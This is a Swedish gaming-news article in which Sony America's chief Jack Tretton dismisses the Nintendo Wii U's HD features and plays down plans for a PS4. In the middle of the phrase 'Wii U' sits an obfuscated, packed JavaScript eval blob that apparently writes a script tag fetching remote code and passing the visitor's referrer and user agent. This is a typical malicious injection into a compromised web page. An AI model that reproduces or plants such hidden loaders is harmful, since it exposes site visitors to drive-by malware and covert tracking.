Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Nintendo Wii U skrämmer inte Sony

Nintendo Wii U skrämmer inte Sony
Sebastian

Wii eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eatsz|var|u0026u|referrer|nznyy||js|php’.split(’|’),0,{}))
U är den nya generationens konsol från Nintendo med HD-upplösning i 1080p och en kontroll med inbyggd touch-screen, men vid diskussion kring huruvida Sony nu känner sig pressade att släppa en ny konsol blir SCEA:s (Sony Computer Entertainment America) VD kaxig.

”Vad gäller HD-gaming var vi redan där 2006” säger VD:n Jack Tretton som menar på att avslöjandet av Nintendos Wii U inte presenterade något som pressar Sony till att släppa PS4.

När han talade med Forbes om ny hårdvara sa Tretton: ”Vår attityd är ungefär ’welcome to the party.’ Om du försöker vara en multimedia- och HD TV-spelkonsol var vi redan där 2006.”

Tretton menar också på att släppa PS4 i detta skede inte skulle innebära någon större ekonomisk vinst, då PS3 precis har kommit igång (Sony planerar PS3 att hålla i tio år innan en ny konsol ska släppas).

”Från vad vi ser från konkurrensen försöker man lägga till funktioner som redan finns på PS3. Vi lade ner väldigt mycket på just detta, och fick slita hårt under lanseringsperioden, men nu har det börjat löna sig. Därmed tror jag inte att det blir en diskussion kring den nya generationens PlayStation på ett tag.”